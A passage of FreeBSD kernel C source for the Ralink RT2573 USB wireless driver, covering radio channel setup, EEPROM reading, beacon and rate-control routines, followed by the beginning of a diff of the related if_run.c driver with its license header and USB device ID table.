DPRINTFN(15, "RF R[%u] <- 0x%05x\n", reg & 3, val & 0xfffff); } static void rum_select_antenna(struct rum_softc *sc) { uint8_t bbp4, bbp77; uint32_t tmp; bbp4 = rum_bbp_read(sc, 4); bbp77 = rum_bbp_read(sc, 77); /* TBD */ /* make sure Rx is disabled before switching antenna */ tmp = rum_read(sc, RT2573_TXRX_CSR0); rum_write(sc, RT2573_TXRX_CSR0, tmp | RT2573_DISABLE_RX); rum_bbp_write(sc, 4, bbp4); rum_bbp_write(sc, 77, bbp77); rum_write(sc, RT2573_TXRX_CSR0, tmp); } /* * Enable multi-rate retries for frames sent at OFDM rates. * In 802.11b/g mode, allow fallback to CCK rates. */ static void rum_enable_mrr(struct rum_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; tmp = rum_read(sc, RT2573_TXRX_CSR4); tmp &= ~RT2573_MRR_CCK_FALLBACK; if (!IEEE80211_IS_CHAN_5GHZ(ic->ic_bsschan)) tmp |= RT2573_MRR_CCK_FALLBACK; tmp |= RT2573_MRR_ENABLED; rum_write(sc, RT2573_TXRX_CSR4, tmp); } static void rum_set_txpreamble(struct rum_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; tmp = rum_read(sc, RT2573_TXRX_CSR4); tmp &= ~RT2573_SHORT_PREAMBLE; if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) tmp |= RT2573_SHORT_PREAMBLE; rum_write(sc, RT2573_TXRX_CSR4, tmp); } static void rum_set_basicrates(struct rum_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; /* update basic rate set */ if (ic->ic_curmode == IEEE80211_MODE_11B) { /* 11b basic rates: 1, 2Mbps */ rum_write(sc, RT2573_TXRX_CSR5, 0x3); } else if (IEEE80211_IS_CHAN_5GHZ(ic->ic_bsschan)) { /* 11a basic rates: 6, 12, 24Mbps */ rum_write(sc, RT2573_TXRX_CSR5, 0x150); } else { /* 11b/g basic rates: 1, 2, 5.5, 11Mbps */ rum_write(sc, RT2573_TXRX_CSR5, 0xf); } } /* * Reprogram MAC/BBP to switch to a new band. Values taken from the reference * driver. */ static void rum_select_band(struct rum_softc *sc, struct ieee80211_channel *c) { uint8_t bbp17, bbp35, bbp96, bbp97, bbp98, bbp104; uint32_t tmp; /* update all BBP registers that depend on the band */ bbp17 = 0x20; bbp96 = 0x48; bbp104 = 0x2c; bbp35 = 0x50; bbp97 = 0x48; bbp98 = 0x48; if (IEEE80211_IS_CHAN_5GHZ(c)) { bbp17 += 0x08; bbp96 += 0x10; bbp104 += 0x0c; bbp35 += 0x10; bbp97 += 0x10; bbp98 += 0x10; } if ((IEEE80211_IS_CHAN_2GHZ(c) && sc->ext_2ghz_lna) || (IEEE80211_IS_CHAN_5GHZ(c) && sc->ext_5ghz_lna)) { bbp17 += 0x10; bbp96 += 0x10; bbp104 += 0x10; } sc->bbp17 = bbp17; rum_bbp_write(sc, 17, bbp17); rum_bbp_write(sc, 96, bbp96); rum_bbp_write(sc, 104, bbp104); if ((IEEE80211_IS_CHAN_2GHZ(c) && sc->ext_2ghz_lna) || (IEEE80211_IS_CHAN_5GHZ(c) && sc->ext_5ghz_lna)) { rum_bbp_write(sc, 75, 0x80); rum_bbp_write(sc, 86, 0x80); rum_bbp_write(sc, 88, 0x80); } rum_bbp_write(sc, 35, bbp35); rum_bbp_write(sc, 97, bbp97); rum_bbp_write(sc, 98, bbp98); tmp = rum_read(sc, RT2573_PHY_CSR0); tmp &= ~(RT2573_PA_PE_2GHZ | RT2573_PA_PE_5GHZ); if (IEEE80211_IS_CHAN_2GHZ(c)) tmp |= RT2573_PA_PE_2GHZ; else tmp |= RT2573_PA_PE_5GHZ; rum_write(sc, RT2573_PHY_CSR0, tmp); } static void rum_set_chan(struct rum_softc *sc, struct ieee80211_channel *c) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct rfprog *rfprog; uint8_t bbp3, bbp94 = RT2573_BBPR94_DEFAULT; int8_t power; int i, chan; chan = ieee80211_chan2ieee(ic, c); if (chan == 0 || chan == IEEE80211_CHAN_ANY) return; /* select the appropriate RF settings based on what EEPROM says */ rfprog = (sc->rf_rev == RT2573_RF_5225 || sc->rf_rev == RT2573_RF_2527) ? rum_rf5225 : rum_rf5226; /* find the settings for this channel (we know it exists) */ for (i = 0; rfprog[i].chan != chan; i++); power = sc->txpow[i]; if (power < 0) { bbp94 += power; power = 0; } else if (power > 31) { bbp94 += power - 31; power = 31; } /* * If we are switching from the 2GHz band to the 5GHz band or * vice-versa, BBP registers need to be reprogrammed. */ if (c->ic_flags != ic->ic_curchan->ic_flags) { rum_select_band(sc, c); rum_select_antenna(sc); } ic->ic_curchan = c; rum_rf_write(sc, RT2573_RF1, rfprog[i].r1); rum_rf_write(sc, RT2573_RF2, rfprog[i].r2); rum_rf_write(sc, RT2573_RF3, rfprog[i].r3 | power << 7); rum_rf_write(sc, RT2573_RF4, rfprog[i].r4 | sc->rffreq << 10); rum_rf_write(sc, RT2573_RF1, rfprog[i].r1); rum_rf_write(sc, RT2573_RF2, rfprog[i].r2); rum_rf_write(sc, RT2573_RF3, rfprog[i].r3 | power << 7 | 1); rum_rf_write(sc, RT2573_RF4, rfprog[i].r4 | sc->rffreq << 10); rum_rf_write(sc, RT2573_RF1, rfprog[i].r1); rum_rf_write(sc, RT2573_RF2, rfprog[i].r2); rum_rf_write(sc, RT2573_RF3, rfprog[i].r3 | power << 7); rum_rf_write(sc, RT2573_RF4, rfprog[i].r4 | sc->rffreq << 10); rum_pause(sc, hz / 100); /* enable smart mode for MIMO-capable RFs */ bbp3 = rum_bbp_read(sc, 3); bbp3 &= ~RT2573_SMART_MODE; if (sc->rf_rev == RT2573_RF_5225 || sc->rf_rev == RT2573_RF_2527) bbp3 |= RT2573_SMART_MODE; rum_bbp_write(sc, 3, bbp3); if (bbp94 != RT2573_BBPR94_DEFAULT) rum_bbp_write(sc, 94, bbp94); /* give the chip some extra time to do the switchover */ rum_pause(sc, hz / 100); } /* * Enable TSF synchronization and tell h/w to start sending beacons for IBSS * and HostAP operating modes. */ static void rum_enable_tsf_sync(struct rum_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); uint32_t tmp; if (vap->iv_opmode != IEEE80211_M_STA) { /* * Change default 16ms TBTT adjustment to 8ms. * Must be done before enabling beacon generation. */ rum_write(sc, RT2573_TXRX_CSR10, 1 << 12 | 8); } tmp = rum_read(sc, RT2573_TXRX_CSR9) & 0xff000000; /* set beacon interval (in 1/16ms unit) */ tmp |= vap->iv_bss->ni_intval * 16; tmp |= RT2573_TSF_TICKING | RT2573_ENABLE_TBTT; if (vap->iv_opmode == IEEE80211_M_STA) tmp |= RT2573_TSF_MODE(1); else tmp |= RT2573_TSF_MODE(2) | RT2573_GENERATE_BEACON; rum_write(sc, RT2573_TXRX_CSR9, tmp); } static void rum_enable_tsf(struct rum_softc *sc) { rum_write(sc, RT2573_TXRX_CSR9, (rum_read(sc, RT2573_TXRX_CSR9) & 0xff000000) | RT2573_TSF_TICKING | RT2573_TSF_MODE(2)); } static void rum_update_slot(struct ifnet *ifp) { struct rum_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; uint8_t slottime; uint32_t tmp; slottime = (ic->ic_flags & IEEE80211_F_SHSLOT) ? 9 : 20; tmp = rum_read(sc, RT2573_MAC_CSR9); tmp = (tmp & ~0xff) | slottime; rum_write(sc, RT2573_MAC_CSR9, tmp); DPRINTF("setting slot time to %uus\n", slottime); } static void rum_set_bssid(struct rum_softc *sc, const uint8_t *bssid) { uint32_t tmp; tmp = bssid[0] | bssid[1] << 8 | bssid[2] << 16 | bssid[3] << 24; rum_write(sc, RT2573_MAC_CSR4, tmp); tmp = bssid[4] | bssid[5] << 8 | RT2573_ONE_BSSID << 16; rum_write(sc, RT2573_MAC_CSR5, tmp); } static void rum_set_macaddr(struct rum_softc *sc, const uint8_t *addr) { uint32_t tmp; tmp = addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24; rum_write(sc, RT2573_MAC_CSR2, tmp); tmp = addr[4] | addr[5] << 8 | 0xff << 16; rum_write(sc, RT2573_MAC_CSR3, tmp); } static void rum_setpromisc(struct rum_softc *sc) { struct ifnet *ifp = sc->sc_ifp; uint32_t tmp; tmp = rum_read(sc, RT2573_TXRX_CSR0); tmp &= ~RT2573_DROP_NOT_TO_ME; if (!(ifp->if_flags & IFF_PROMISC)) tmp |= RT2573_DROP_NOT_TO_ME; rum_write(sc, RT2573_TXRX_CSR0, tmp); DPRINTF("%s promiscuous mode\n", (ifp->if_flags & IFF_PROMISC) ? "entering" : "leaving"); } static void rum_update_promisc(struct ifnet *ifp) { struct rum_softc *sc = ifp->if_softc; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; RUM_LOCK(sc); rum_setpromisc(sc); RUM_UNLOCK(sc); } static void rum_update_mcast(struct ifnet *ifp) { static int warning_printed; if (warning_printed == 0) { if_printf(ifp, "need to implement %s\n", __func__); warning_printed = 1; } } static const char * rum_get_rf(int rev) { switch (rev) { case RT2573_RF_2527: return "RT2527 (MIMO XR)"; case RT2573_RF_2528: return "RT2528"; case RT2573_RF_5225: return "RT5225 (MIMO XR)"; case RT2573_RF_5226: return "RT5226"; default: return "unknown"; } } static void rum_read_eeprom(struct rum_softc *sc) { uint16_t val; #ifdef RUM_DEBUG int i; #endif /* read MAC address */ rum_eeprom_read(sc, RT2573_EEPROM_ADDRESS, sc->sc_bssid, 6); rum_eeprom_read(sc, RT2573_EEPROM_ANTENNA, &val, 2); val = le16toh(val); sc->rf_rev = (val >> 11) & 0x1f; sc->hw_radio = (val >> 10) & 0x1; sc->rx_ant = (val >> 4) & 0x3; sc->tx_ant = (val >> 2) & 0x3; sc->nb_ant = val & 0x3; DPRINTF("RF revision=%d\n", sc->rf_rev); rum_eeprom_read(sc, RT2573_EEPROM_CONFIG2, &val, 2); val = le16toh(val); sc->ext_5ghz_lna = (val >> 6) & 0x1; sc->ext_2ghz_lna = (val >> 4) & 0x1; DPRINTF("External 2GHz LNA=%d\nExternal 5GHz LNA=%d\n", sc->ext_2ghz_lna, sc->ext_5ghz_lna); rum_eeprom_read(sc, RT2573_EEPROM_RSSI_2GHZ_OFFSET, &val, 2); val = le16toh(val); if ((val & 0xff) != 0xff) sc->rssi_2ghz_corr = (int8_t)(val & 0xff); /* signed */ /* Only [-10, 10] is valid */ if (sc->rssi_2ghz_corr < -10 || sc->rssi_2ghz_corr > 10) sc->rssi_2ghz_corr = 0; rum_eeprom_read(sc, RT2573_EEPROM_RSSI_5GHZ_OFFSET, &val, 2); val = le16toh(val); if ((val & 0xff) != 0xff) sc->rssi_5ghz_corr = (int8_t)(val & 0xff); /* signed */ /* Only [-10, 10] is valid */ if (sc->rssi_5ghz_corr < -10 || sc->rssi_5ghz_corr > 10) sc->rssi_5ghz_corr = 0; if (sc->ext_2ghz_lna) sc->rssi_2ghz_corr -= 14; if (sc->ext_5ghz_lna) sc->rssi_5ghz_corr -= 14; DPRINTF("RSSI 2GHz corr=%d\nRSSI 5GHz corr=%d\n", sc->rssi_2ghz_corr, sc->rssi_5ghz_corr); rum_eeprom_read(sc, RT2573_EEPROM_FREQ_OFFSET, &val, 2); val = le16toh(val); if ((val & 0xff) != 0xff) sc->rffreq = val & 0xff; DPRINTF("RF freq=%d\n", sc->rffreq); /* read Tx power for all a/b/g channels */ rum_eeprom_read(sc, RT2573_EEPROM_TXPOWER, sc->txpow, 14); /* XXX default Tx power for 802.11a channels */ memset(sc->txpow + 14, 24, sizeof (sc->txpow) - 14); #ifdef RUM_DEBUG for (i = 0; i < 14; i++) DPRINTF("Channel=%d Tx power=%d\n", i + 1, sc->txpow[i]); #endif /* read default values for BBP registers */ rum_eeprom_read(sc, RT2573_EEPROM_BBP_BASE, sc->bbp_prom, 2 * 16); #ifdef RUM_DEBUG for (i = 0; i < 14; i++) { if (sc->bbp_prom[i].reg == 0 || sc->bbp_prom[i].reg == 0xff) continue; DPRINTF("BBP R%d=%02x\n", sc->bbp_prom[i].reg, sc->bbp_prom[i].val); } #endif } static int rum_bbp_init(struct rum_softc *sc) { int i, ntries; /* wait for BBP to be ready */ for (ntries = 0; ntries < 100; ntries++) { const uint8_t val = rum_bbp_read(sc, 0); if (val != 0 && val != 0xff) break; if (rum_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for BBP\n"); return EIO; } /* initialize BBP registers to default values */ for (i = 0; i < N(rum_def_bbp); i++) rum_bbp_write(sc, rum_def_bbp[i].reg, rum_def_bbp[i].val); /* write vendor-specific BBP values (from EEPROM) */ for (i = 0; i < 16; i++) { if (sc->bbp_prom[i].reg == 0 || sc->bbp_prom[i].reg == 0xff) continue; rum_bbp_write(sc, sc->bbp_prom[i].reg, sc->bbp_prom[i].val); } return 0; } static void rum_init_locked(struct rum_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; usb_error_t error; int i, ntries; RUM_LOCK_ASSERT(sc, MA_OWNED); rum_stop(sc); /* initialize MAC registers to default values */ for (i = 0; i < N(rum_def_mac); i++) rum_write(sc, rum_def_mac[i].reg, rum_def_mac[i].val); /* set host ready */ rum_write(sc, RT2573_MAC_CSR1, 3); rum_write(sc, RT2573_MAC_CSR1, 0); /* wait for BBP/RF to wakeup */ for (ntries = 0; ntries < 100; ntries++) { if (rum_read(sc, RT2573_MAC_CSR12) & 8) break; rum_write(sc, RT2573_MAC_CSR12, 4); /* force wakeup */ if (rum_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for BBP/RF to wakeup\n"); goto fail; } if ((error = rum_bbp_init(sc)) != 0) goto fail; /* select default channel */ rum_select_band(sc, ic->ic_curchan); rum_select_antenna(sc); rum_set_chan(sc, ic->ic_curchan); /* clear STA registers */ rum_read_multi(sc, RT2573_STA_CSR0, sc->sta, sizeof sc->sta); rum_set_macaddr(sc, IF_LLADDR(ifp)); /* initialize ASIC */ rum_write(sc, RT2573_MAC_CSR1, 4); /* * Allocate Tx and Rx xfer queues. */ rum_setup_tx_list(sc); /* update Rx filter */ tmp = rum_read(sc, RT2573_TXRX_CSR0) & 0xffff; tmp |= RT2573_DROP_PHY_ERROR | RT2573_DROP_CRC_ERROR; if (ic->ic_opmode != IEEE80211_M_MONITOR) { tmp |= RT2573_DROP_CTL | RT2573_DROP_VER_ERROR | RT2573_DROP_ACKCTS; if (ic->ic_opmode != IEEE80211_M_HOSTAP) tmp |= RT2573_DROP_TODS; if (!(ifp->if_flags & IFF_PROMISC)) tmp |= RT2573_DROP_NOT_TO_ME; } rum_write(sc, RT2573_TXRX_CSR0, tmp); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; usbd_xfer_set_stall(sc->sc_xfer[RUM_BULK_WR]); usbd_transfer_start(sc->sc_xfer[RUM_BULK_RD]); return; fail: rum_stop(sc); #undef N } static void rum_init(void *priv) { struct rum_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; RUM_LOCK(sc); rum_init_locked(sc); RUM_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } static void rum_stop(struct rum_softc *sc) { struct ifnet *ifp = sc->sc_ifp; uint32_t tmp; RUM_LOCK_ASSERT(sc, MA_OWNED); ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); RUM_UNLOCK(sc); /* * Drain the USB transfers, if not already drained: */ usbd_transfer_drain(sc->sc_xfer[RUM_BULK_WR]); usbd_transfer_drain(sc->sc_xfer[RUM_BULK_RD]); RUM_LOCK(sc); rum_unsetup_tx_list(sc); /* disable Rx */ tmp = rum_read(sc, RT2573_TXRX_CSR0); rum_write(sc, RT2573_TXRX_CSR0, tmp | RT2573_DISABLE_RX); /* reset ASIC */ rum_write(sc, RT2573_MAC_CSR1, 3); rum_write(sc, RT2573_MAC_CSR1, 0); } static void rum_load_microcode(struct rum_softc *sc, const uint8_t *ucode, size_t size) { struct usb_device_request req; uint16_t reg = RT2573_MCU_CODE_BASE; usb_error_t err; /* copy firmware image into NIC */ for (; size >= 4; reg += 4, ucode += 4, size -= 4) { err = rum_write(sc, reg, UGETDW(ucode)); if (err) { /* firmware already loaded ? */ device_printf(sc->sc_dev, "Firmware load " "failure! (ignored)\n"); break; } } req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RT2573_MCU_CNTL; USETW(req.wValue, RT2573_MCU_RUN); USETW(req.wIndex, 0); USETW(req.wLength, 0); err = rum_do_request(sc, &req, NULL); if (err != 0) { device_printf(sc->sc_dev, "could not run firmware: %s\n", usbd_errstr(err)); } /* give the chip some time to boot */ rum_pause(sc, hz / 8); } static void rum_prepare_beacon(struct rum_softc *sc, struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; const struct ieee80211_txparam *tp; struct rum_tx_desc desc; struct mbuf *m0; if (vap->iv_bss->ni_chan == IEEE80211_CHAN_ANYC) return; if (ic->ic_bsschan == IEEE80211_CHAN_ANYC) return; m0 = ieee80211_beacon_alloc(vap->iv_bss, &RUM_VAP(vap)->bo); if (m0 == NULL) return; tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_bsschan)]; rum_setup_tx_desc(sc, &desc, RT2573_TX_TIMESTAMP, RT2573_TX_HWSEQ, m0->m_pkthdr.len, tp->mgmtrate); /* copy the first 24 bytes of Tx descriptor into NIC memory */ rum_write_multi(sc, RT2573_HW_BEACON_BASE0, (uint8_t *)&desc, 24); /* copy beacon header and payload into NIC memory */ rum_write_multi(sc, RT2573_HW_BEACON_BASE0 + 24, mtod(m0, uint8_t *), m0->m_pkthdr.len); m_freem(m0); } static int rum_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ifnet *ifp = ni->ni_ic->ic_ifp; struct rum_softc *sc = ifp->if_softc; RUM_LOCK(sc); /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { RUM_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return ENETDOWN; } if (sc->tx_nfree < RUM_TX_MINFREE) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; RUM_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return EIO; } ifp->if_opackets++; if (params == NULL) { /* * Legacy path; interpret frame contents to decide * precisely how to send the frame. */ if (rum_tx_mgt(sc, m, ni) != 0) goto bad; } else { /* * Caller supplied explicit parameters to use in * sending the frame. */ if (rum_tx_raw(sc, m, ni, params) != 0) goto bad; } RUM_UNLOCK(sc); return 0; bad: ifp->if_oerrors++; RUM_UNLOCK(sc); ieee80211_free_node(ni); return EIO; } static void rum_ratectl_start(struct rum_softc *sc, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct rum_vap *rvp = RUM_VAP(vap); /* clear statistic registers (STA_CSR0 to STA_CSR5) */ rum_read_multi(sc, RT2573_STA_CSR0, sc->sta, sizeof sc->sta); usb_callout_reset(&rvp->ratectl_ch, hz, rum_ratectl_timeout, rvp); } static void rum_ratectl_timeout(void *arg) { struct rum_vap *rvp = arg; struct ieee80211vap *vap = &rvp->vap; struct ieee80211com *ic = vap->iv_ic; ieee80211_runtask(ic, &rvp->ratectl_task); } static void rum_ratectl_task(void *arg, int pending) { struct rum_vap *rvp = arg; struct ieee80211vap *vap = &rvp->vap; struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; struct rum_softc *sc = ifp->if_softc; struct ieee80211_node *ni; int ok, fail; int sum, retrycnt; RUM_LOCK(sc); /* read and clear statistic registers (STA_CSR0 to STA_CSR10) */ rum_read_multi(sc, RT2573_STA_CSR0, sc->sta, sizeof(sc->sta)); ok = (le32toh(sc->sta[4]) >> 16) + /* TX ok w/o retry */ (le32toh(sc->sta[5]) & 0xffff); /* TX ok w/ retry */ fail = (le32toh(sc->sta[5]) >> 16); /* TX retry-fail count */ sum = ok+fail; retrycnt = (le32toh(sc->sta[5]) & 0xffff) + fail; ni = ieee80211_ref_node(vap->iv_bss); ieee80211_ratectl_tx_update(vap, ni, &sum, &ok, &retrycnt); (void) ieee80211_ratectl_rate(ni, NULL, 0); ieee80211_free_node(ni); ifp->if_oerrors += fail; /* count TX retry-fail as Tx errors */ usb_callout_reset(&rvp->ratectl_ch, hz, rum_ratectl_timeout, rvp); RUM_UNLOCK(sc); } static void rum_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rum_softc *sc = ifp->if_softc; uint32_t tmp; RUM_LOCK(sc); /* abort TSF synchronization */ tmp = rum_read(sc, RT2573_TXRX_CSR9); rum_write(sc, RT2573_TXRX_CSR9, tmp & ~0x00ffffff); rum_set_bssid(sc, ifp->if_broadcastaddr); RUM_UNLOCK(sc); } static void rum_scan_end(struct ieee80211com *ic) { struct rum_softc *sc = ic->ic_ifp->if_softc; RUM_LOCK(sc); rum_enable_tsf_sync(sc); rum_set_bssid(sc, sc->sc_bssid); RUM_UNLOCK(sc); } static void rum_set_channel(struct ieee80211com *ic) { struct rum_softc *sc = ic->ic_ifp->if_softc; RUM_LOCK(sc); rum_set_chan(sc, ic->ic_curchan); RUM_UNLOCK(sc); } static int rum_get_rssi(struct rum_softc *sc, uint8_t raw) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int lna, agc, rssi; lna = (raw >> 5) & 0x3; agc = raw & 0x1f; if (lna == 0) { /* * No RSSI mapping * * NB: Since RSSI is relative to noise floor, -1 is * adequate for caller to know error happened. */ return -1; } rssi = (2 * agc) - RT2573_NOISE_FLOOR; if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { rssi += sc->rssi_2ghz_corr; if (lna == 1) rssi -= 64; else if (lna == 2) rssi -= 74; else if (lna == 3) rssi -= 90; } else { rssi += sc->rssi_5ghz_corr; if (!sc->ext_5ghz_lna && lna != 1) rssi += 4; if (lna == 1) rssi -= 64; else if (lna == 2) rssi -= 86; else if (lna == 3) rssi -= 100; } return rssi; } static int rum_pause(struct rum_softc *sc, int timeout) { usb_pause_mtx(&sc->sc_mtx, timeout); return (0); } static device_method_t rum_methods[] = { /* Device interface */ DEVMETHOD(device_probe, rum_match), DEVMETHOD(device_attach, rum_attach), DEVMETHOD(device_detach, rum_detach), DEVMETHOD_END }; static driver_t rum_driver = { .name = "rum", .methods = rum_methods, .size = sizeof(struct rum_softc), }; static devclass_t rum_devclass; DRIVER_MODULE(rum, uhub, rum_driver, rum_devclass, NULL, 0); MODULE_DEPEND(rum, wlan, 1, 1, 1); MODULE_DEPEND(rum, usb, 1, 1, 1); MODULE_VERSION(rum, 1); diff --git a/sys/dev/usb/wlan/if_run.c b/sys/dev/usb/wlan/if_run.c index 2ced8433c8e3..38b2ae382d23 100644 --- a/sys/dev/usb/wlan/if_run.c +++ b/sys/dev/usb/wlan/if_run.c @@ -1,6302 +1,6302 @@ /*- * Copyright (c) 2008,2010 Damien Bergamini * ported to FreeBSD by Akinori Furukoshi * USB Consulting, Hans Petter Selasky * Copyright (c) 2013-2014 Kevin Lo * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include __FBSDID("$FreeBSD$"); /*- * Ralink Technology RT2700U/RT2800U/RT3000U/RT3900E chipset driver. * http://www.ralinktech.com/ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "usbdevs.h" #define USB_DEBUG_VAR run_debug #include #include #include #include #ifdef USB_DEBUG #define RUN_DEBUG #endif #ifdef RUN_DEBUG int run_debug = 0; static SYSCTL_NODE(_hw_usb, OID_AUTO, run, CTLFLAG_RW, 0, "USB run"); SYSCTL_INT(_hw_usb_run, OID_AUTO, debug, CTLFLAG_RW, &run_debug, 0, "run debug level"); #endif #define IEEE80211_HAS_ADDR4(wh) \ (((wh)->i_fc[1] & IEEE80211_FC1_DIR_MASK) == IEEE80211_FC1_DIR_DSTODS) /* * Because of LOR in run_key_delete(), use atomic instead. * '& RUN_CMDQ_MASQ' is to loop cmdq[]. */ #define RUN_CMDQ_GET(c) (atomic_fetchadd_32((c), 1) & RUN_CMDQ_MASQ) static const STRUCT_USB_HOST_ID run_devs[] = { #define RUN_DEV(v,p) { USB_VP(USB_VENDOR_##v, USB_PRODUCT_##v##_##p) } #define RUN_DEV_EJECT(v,p) \ { USB_VPI(USB_VENDOR_##v, USB_PRODUCT_##v##_##p, 0) } RUN_DEV(ABOCOM, RT2770), RUN_DEV(ABOCOM, RT2870), RUN_DEV(ABOCOM, RT3070), RUN_DEV(ABOCOM, RT3071), RUN_DEV(ABOCOM, RT3072), RUN_DEV(ABOCOM2, RT2870_1), RUN_DEV(ACCTON, RT2770), RUN_DEV(ACCTON, RT2870_1), RUN_DEV(ACCTON, RT2870_2), RUN_DEV(ACCTON, RT2870_3), RUN_DEV(ACCTON, RT2870_4), RUN_DEV(ACCTON, RT2870_5), RUN_DEV(ACCTON, RT3070), RUN_DEV(ACCTON, RT3070_1), RUN_DEV(ACCTON, RT3070_2), RUN_DEV(ACCTON, RT3070_3), RUN_DEV(ACCTON, RT3070_4), RUN_DEV(ACCTON, RT3070_5), RUN_DEV(AIRTIES, RT3070), RUN_DEV(ALLWIN, RT2070), RUN_DEV(ALLWIN, RT2770), RUN_DEV(ALLWIN, RT2870), RUN_DEV(ALLWIN, RT3070), RUN_DEV(ALLWIN, RT3071), RUN_DEV(ALLWIN, RT3072), RUN_DEV(ALLWIN, RT3572), RUN_DEV(AMIGO, RT2870_1), RUN_DEV(AMIGO, RT2870_2), RUN_DEV(AMIT, CGWLUSB2GNR), RUN_DEV(AMIT, RT2870_1), RUN_DEV(AMIT2, RT2870), RUN_DEV(ASUS, RT2870_1), RUN_DEV(ASUS, RT2870_2), RUN_DEV(ASUS, RT2870_3), RUN_DEV(ASUS, RT2870_4), RUN_DEV(ASUS, RT2870_5), RUN_DEV(ASUS, USBN13), RUN_DEV(ASUS, RT3070_1), RUN_DEV(ASUS, USBN66), RUN_DEV(ASUS, USB_N53), RUN_DEV(ASUS2, USBN11), RUN_DEV(AZUREWAVE, RT2870_1), RUN_DEV(AZUREWAVE, RT2870_2), RUN_DEV(AZUREWAVE, RT3070_1), RUN_DEV(AZUREWAVE, RT3070_2), RUN_DEV(AZUREWAVE, RT3070_3), RUN_DEV(BELKIN, F9L1103), RUN_DEV(BELKIN, F5D8053V3), RUN_DEV(BELKIN, F5D8055), RUN_DEV(BELKIN, F5D8055V2), RUN_DEV(BELKIN, F6D4050V1), RUN_DEV(BELKIN, F6D4050V2), RUN_DEV(BELKIN, RT2870_1), RUN_DEV(BELKIN, RT2870_2), RUN_DEV(CISCOLINKSYS, AE1000), RUN_DEV(CISCOLINKSYS2, RT3070), RUN_DEV(CISCOLINKSYS3, RT3070), RUN_DEV(CONCEPTRONIC2, RT2870_1), RUN_DEV(CONCEPTRONIC2, RT2870_2), RUN_DEV(CONCEPTRONIC2, RT2870_3), RUN_DEV(CONCEPTRONIC2, RT2870_4), RUN_DEV(CONCEPTRONIC2, RT2870_5), RUN_DEV(CONCEPTRONIC2, RT2870_6), RUN_DEV(CONCEPTRONIC2, RT2870_7), RUN_DEV(CONCEPTRONIC2, RT2870_8), RUN_DEV(CONCEPTRONIC2, RT3070_1), RUN_DEV(CONCEPTRONIC2, RT3070_2), RUN_DEV(CONCEPTRONIC2, VIGORN61), RUN_DEV(COREGA, CGWLUSB300GNM), RUN_DEV(COREGA, RT2870_1), RUN_DEV(COREGA, RT2870_2), RUN_DEV(COREGA, RT2870_3), RUN_DEV(COREGA, RT3070), RUN_DEV(CYBERTAN, RT2870), RUN_DEV(DLINK, RT2870), RUN_DEV(DLINK, RT3072), RUN_DEV(DLINK, DWA127), RUN_DEV(DLINK, DWA140B3), RUN_DEV(DLINK, DWA160B2), RUN_DEV(DLINK, DWA162), RUN_DEV(DLINK2, DWA130), RUN_DEV(DLINK2, RT2870_1), RUN_DEV(DLINK2, RT2870_2), RUN_DEV(DLINK2, RT3070_1), RUN_DEV(DLINK2, RT3070_2), RUN_DEV(DLINK2, RT3070_3), RUN_DEV(DLINK2, RT3070_4), RUN_DEV(DLINK2, RT3070_5), RUN_DEV(DLINK2, RT3072), RUN_DEV(DLINK2, RT3072_1), RUN_DEV(EDIMAX, EW7717), RUN_DEV(EDIMAX, EW7718), RUN_DEV(EDIMAX, EW7733UND), RUN_DEV(EDIMAX, RT2870_1), 